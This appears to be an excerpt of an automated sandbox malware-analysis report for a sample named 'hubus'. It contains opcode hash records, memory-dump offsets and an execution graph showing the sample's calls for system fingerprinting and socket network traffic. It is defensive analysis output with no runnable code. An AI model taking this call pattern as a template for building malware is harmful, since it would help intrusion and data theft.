                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: fe63748e1cac66a4f6851445ce64aff934db29c31f0b0583e37a83a3c404798a
                                                                                                                                                                                                                                                              • Instruction ID: 95c11236b7e562b67240873166c12c7710b8d3a3f2a89799b5111f9cf9a220c7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe63748e1cac66a4f6851445ce64aff934db29c31f0b0583e37a83a3c404798a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90C08C240E430887D50433E0780FB2C7A8C2F0A219F506522F80D200112E344048D4AB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b02824e6abe107fa3bd105c019fefbaaab66e3aba32a42b943865e46dd748d0c
                                                                                                                                                                                                                                                              • Instruction ID: b565f13f0a37d5b7bf0f0ae28a8524ed23041d772352030e8c66f238bdd593fe
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b02824e6abe107fa3bd105c019fefbaaab66e3aba32a42b943865e46dd748d0c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DC0022010E2C09ED392C6648952451BF719F8621832988CFD4888B253C66A9A2BEB22
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 488c93532ee6e63912ff9be978aa30257d25a867edc4f4ebd97b8fcb004d53ef
                                                                                                                                                                                                                                                              • Instruction ID: 307ba3d1e07f30c503c7635f61b5bb0e440ded9869691aff1ec461a9e265c31b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 488c93532ee6e63912ff9be978aa30257d25a867edc4f4ebd97b8fcb004d53ef
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EC04C362CA3118FEB89E508CD82798A3A19B98354F59806DD818DF2C6DF2AD443A584
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 53e70c9395fc48911bc637a868248d97757a60a4fbe52750d652d6f90b2819b2
                                                                                                                                                                                                                                                              • Instruction ID: 553e8dd1cc7d2d653b34d8ae988d75e9a67864252e1dee6d32196cc876492563
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e70c9395fc48911bc637a868248d97757a60a4fbe52750d652d6f90b2819b2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25C0122034E1C00FC7038BA488608A8BFB28E8710870DC8EA9488CB267CA269807C740
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 3b1a1d2c51eb46436bc1e63e60dddf7c3842743f548757221c183acaad58979a
                                                                                                                                                                                                                                                              • Instruction ID: 01d821688579c1ea58de5184dfd31d82ec0c71ffb08d6b21eb54c75cc070ddcc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b1a1d2c51eb46436bc1e63e60dddf7c3842743f548757221c183acaad58979a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7C08C36240208AFC3009B58DC44C897BB8EF086243058090F9088B332C332EC10CA94
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4c0b8db05ee3753b53eb5d90248cacf8079e738f853c802052dc0c7a8bcc829c
                                                                                                                                                                                                                                                              • Instruction ID: ef810bc802e60782972c26cf2f935a98b43e660299947d83fe1007f74316a489
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c0b8db05ee3753b53eb5d90248cacf8079e738f853c802052dc0c7a8bcc829c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6C00276E1001A9A8B00DAD9E4408DCB774EB95321B004026E214A6104D63015268B50
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: <Z;@$TJBr$Te=r$r)xI$xb@r
                                                                                                                                                                                                                                                              • API String ID: 0-2856210524
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: <Z;@$r)xI
                                                                                                                                                                                                                                                              • API String ID: 0-1708893652
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: `*#o
                                                                                                                                                                                                                                                              • API String ID: 0-1276960897
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: dAr
                                                                                                                                                                                                                                                              • API String ID: 0-1474158906
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: dAr
                                                                                                                                                                                                                                                              • API String ID: 0-1474158906
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4|Br
                                                                                                                                                                                                                                                              • API String ID: 0-2141330505
                                                                                                                                                                                                                                                              • Opcode ID: 1f7e4d238df993f3ab5077349249b1fc9d8c410d4aa3134778423c3dcdf39614
                                                                                                                                                                                                                                                              • Instruction ID: 139482f82428cd9e64c2026c67df675eb45a96a15012ca0e766165fd8214e983
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f7e4d238df993f3ab5077349249b1fc9d8c410d4aa3134778423c3dcdf39614
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3581E675A05218CFEB64CF29D885BAABBF6FB89301F1480EAD509A7340DB345E85CF51
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4|Br
                                                                                                                                                                                                                                                              • API String ID: 0-2141330505
                                                                                                                                                                                                                                                              • Opcode ID: 2fa60a78818f9c7c22bd4743d8bd1055f0985647e00109ea805c48f776404826
                                                                                                                                                                                                                                                              • Instruction ID: aaa9d45c29428381af4f7f83bb7bd619c60d4d5ddd3117e1d43d1ffee13fd139
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fa60a78818f9c7c22bd4743d8bd1055f0985647e00109ea805c48f776404826
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4881D775A05218CFEB64CF29D984BAABBF6FB89301F1480EAD509A7340DB345E85CF51
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2128380932998c47e934ee96ce8fd52f3b1871e78f5c656144ddc1107e25b964
                                                                                                                                                                                                                                                              • Instruction ID: ec79acfb533964b8f3cdb72232ef28a42a59836dd4deb3d0595154146fe984e0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2128380932998c47e934ee96ce8fd52f3b1871e78f5c656144ddc1107e25b964
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC514575E09208CBEB14DFA9E498BEDBBF2FB49721F10902AE415A7250EB345C46CB50
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2996ca39634b6ca34a67f042933d67eb7305388054ace9d745093fcd8d0fd6be
                                                                                                                                                                                                                                                              • Instruction ID: 008571055cb1b7af36614406d921d6b81142ffde92e0f6dd9489cc07d8da320f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2996ca39634b6ca34a67f042933d67eb7305388054ace9d745093fcd8d0fd6be
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79512575E09208CBEB14DFA9E498BEDBBF2FB49721F10902AE415A7294DB344C49CF50
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 915440388b1d83d62d833ecc261efc670e31f6f34b5a61c81d09adecb8a7afaf
                                                                                                                                                                                                                                                              • Instruction ID: 1dbb19cc1588b893c5babe6dc4e457d8117bde8d172578bf1d6169aa52479743
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 915440388b1d83d62d833ecc261efc670e31f6f34b5a61c81d09adecb8a7afaf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E94155B1E016199BDB08CFABD94069EFBF3BFC8300F14C07AD958AB254EB3059468B54
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 97b74e623bad45cda4d2ae4221d94d0a6ac06b0f3966df7096970917a1c12583
                                                                                                                                                                                                                                                              • Instruction ID: c725dfe677992b86738886d4b374550ed3a10c0f2324ae9a63aca35966c69052
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97b74e623bad45cda4d2ae4221d94d0a6ac06b0f3966df7096970917a1c12583
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7410675D056488FDB05CFAAD848B9DBBF2FF89300F18C0AAD448AB255DB744986CF10
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d86768db4d14d1af4d8c8cc7ac17b3156b9369360bcd5de7c4876b7093f34b56
                                                                                                                                                                                                                                                              • Instruction ID: 8557f31139e4688d47f0c05b9e6ae3e0a16d28b5fe561c79867d51cab479d9d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d86768db4d14d1af4d8c8cc7ac17b3156b9369360bcd5de7c4876b7093f34b56
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8741A174E056188BEB14CFAAD948BDDBBF6BB89300F14C0AAD409AB254DBB41985CF54
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 5ee97c6453863f233144461782e14229a38ccef14c120f6bcb32d1b2c85dc488
                                                                                                                                                                                                                                                              • Instruction ID: 042e24465f910ee839f615036651240ef6548995e31b2f12cb185148e779608a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ee97c6453863f233144461782e14229a38ccef14c120f6bcb32d1b2c85dc488
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70319D71E156188BEB5DCF5B8C0169AFAFBAFC9300F14C0FA980CA7254DB704A858E51
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              • String ID: (Ar$4'=r$4'=r$4'=r$4'=r$pAr
                                                                                                                                                                                                                                                              • API String ID: 0-254864904

Execution Graph

Execution Coverage: 13.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.9%
Total number of Nodes: 563
Total number of Limit Nodes: 39
41be24 CreateDesktopW 14159->14160 14160->14157 14161 41cb61 14162 41cb80 14161->14162 14162->14162 14163 41cc3a 14162->14163 14164 41cc24 select 14162->14164 14164->14163 14165 430fa3 CoSetProxyBlanket 14166 43cc21 14167 43cc2b 14166->14167 14169 43ccfe 14167->14169 14172 43c160 LdrInitializeThunk 14167->14172 14171 43c160 LdrInitializeThunk 14169->14171 14171->14169 14172->14169 14173 421de0 14174 421e45 14173->14174 14175 421dee 14173->14175 14179 421f00 14175->14179 14177 421ebc 14177->14174 14178 4205d0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14177->14178 14178->14174 14180 421f10 14179->14180 14180->14180 14181 43f7c0 LdrInitializeThunk 14180->14181 14182 42200f 14181->14182 14183 40eba3 CoInitializeSecurity CoInitializeSecurity 14184 43c367 14185 43c380 14184->14185 14187 43c3ce 14185->14187 14191 43c160 LdrInitializeThunk 14185->14191 14188 43c44e 14187->14188 14190 43c160 LdrInitializeThunk 14187->14190 14190->14188 14191->14187 14192 410d64 14195 410d81 14192->14195 14194 40f364 14195->14194 14196 415630 14195->14196 14197 415650 14196->14197 14197->14197 14198 43f5e0 LdrInitializeThunk 14197->14198 14199 415781 14198->14199 14200 41580a 14199->14200 14201 4157cd 14199->14201 14202 43f9c0 LdrInitializeThunk 14199->14202 14203 4157fb 14199->14203 14200->14194 14201->14200 14201->14203 14204 43fad0 LdrInitializeThunk 14201->14204 14202->14201 14203->14200 14203->14203 14205 415bfe 14203->14205 14209 43c160 LdrInitializeThunk 14203->14209 14204->14203 14210 43c160 LdrInitializeThunk 14205->14210 14208 415d2d 14209->14205 14210->14208 14211 435c65 14214 435c83 14211->14214 14212 435cf1 14214->14212 14215 43c160 LdrInitializeThunk 14214->14215 14215->14214 14216 40d7ec 14217 40d850 14216->14217 14220 40d8ae 14217->14220 14223 43c160 LdrInitializeThunk 14217->14223 14218 40d9ae 14220->14218 14222 43c160 LdrInitializeThunk 14220->14222 14222->14218 14223->14220 14224 40e5ad 14225 40e5d0 14224->14225 14229 437b10 14225->14229 14227 437b10 
11 API calls 14228 40e712 14227->14228 14228->14227 14230 437b40 CoCreateInstance 14229->14230 14232 438140 14230->14232 14233 437d95 SysAllocString 14230->14233 14234 438150 GetVolumeInformationW 14232->14234 14236 437e1d 14233->14236 14244 438172 14234->14244 14237 437e25 CoSetProxyBlanket 14236->14237 14238 43812f SysFreeString 14236->14238 14239 438125 14237->14239 14240 437e45 SysAllocString 14237->14240 14238->14232 14239->14238 14242 437f00 14240->14242 14242->14242 14243 437f16 SysAllocString 14242->14243 14246 437f3a 14243->14246 14244->14228 14245 438113 SysFreeString SysFreeString 14245->14239 14246->14245 14247 438105 14246->14247 14248 437f7e VariantInit 14246->14248 14247->14245 14250 437fd0 14248->14250 14249 4380f4 VariantClear 14249->14247 14250->14249 14251 42d0f3 14252 42d0fe 14251->14252 14256 437740 14252->14256 14254 437740 LdrInitializeThunk 14255 42d10c 14254->14255 14255->14254 14257 43774e 14256->14257 14260 437842 14257->14260 14265 43c160 LdrInitializeThunk 14257->14265 14261 4378c4 14260->14261 14262 43795c 14260->14262 14264 43c160 LdrInitializeThunk 14260->14264 14261->14255 14262->14261 14266 43c160 LdrInitializeThunk 14262->14266 14264->14260 14265->14257 14266->14262 14267 41f4b0 14268 43ddb0 14267->14268 14269 41f532 getaddrinfo 14268->14269 14272 41f55c 14269->14272 14273 41f54e 14269->14273 14270 41f5b7 socket 14271 41f5cf connect 14270->14271 14270->14272 14271->14272 14271->14273 14272->14270 14272->14273 14273->14273 14274 41f915 send 14273->14274 14277 41f557 14273->14277 14275 41f927 14274->14275 14275->14277 14283 41ff20 14275->14283 14278 41fe7b 14278->14277 14279 41e800 send 14278->14279 14279->14277 14280 41ff20 recv 14282 41fc1d 14280->14282 14281 41f9aa 14281->14277 14281->14278 14281->14282 14282->14277 14282->14280 14286 41ff40 14283->14286 14284 41ff54 recv 14285 42012e 14284->14285 14284->14286 14285->14281 14286->14284 14286->14285 14286->14286 14287 43eff0 14288 43f001 14287->14288 14289 43f17e 14288->14289 
